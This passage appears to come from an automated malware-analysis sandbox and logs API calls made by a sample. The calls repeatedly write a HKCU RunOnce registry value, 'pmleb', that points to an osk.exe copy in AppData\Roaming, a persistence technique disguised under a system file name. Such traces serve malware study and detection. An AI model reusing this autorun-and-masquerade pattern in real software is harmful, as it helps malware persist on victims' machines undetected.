lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.065] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.065] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.065] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.065] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.065] RegCloseKey (hKey=0x280) returned 0x0 [0082.065] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.066] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.066] SetTimer (hWnd=0x20280, nIDEvent=0x20d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d9 [0082.066] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.077] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.077] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.077] KillTimer (hWnd=0x20280, uIDEvent=0x20d9) returned 1 [0082.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.077] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0082.078] IUnknown:Release (This=0x787518) returned 0x1 [0082.078] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.078] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.078] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.078] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.079] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0082.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.079] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5f [0082.079] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.080] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0082.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.080] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.080] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.080] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.080] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.080] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.080] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.081] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.081] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.081] RegCloseKey (hKey=0x280) returned 0x0 [0082.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.081] SetTimer (hWnd=0x20280, nIDEvent=0x20da, uElapse=0xa, lpTimerFunc=0x0) returned 0x20da [0082.081] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.093] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.093] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.093] KillTimer (hWnd=0x20280, uIDEvent=0x20da) returned 1 [0082.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.093] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.093] IUnknown:Release (This=0x787518) returned 0x1 [0082.093] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.093] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.093] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.094] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.094] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0082.094] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.094] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x60 [0082.094] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.095] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0082.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.095] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.095] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.095] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.095] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.095] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.095] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.095] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.096] RegCloseKey (hKey=0x280) returned 0x0 [0082.096] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.096] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.096] SetTimer (hWnd=0x20280, nIDEvent=0x20db, uElapse=0xa, lpTimerFunc=0x0) returned 0x20db [0082.096] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.108] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.108] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.108] KillTimer (hWnd=0x20280, uIDEvent=0x20db) returned 1 [0082.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.109] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.109] IUnknown:Release (This=0x787518) returned 0x1 [0082.109] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.109] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.109] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.109] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.109] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0082.109] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.109] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x61 [0082.109] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
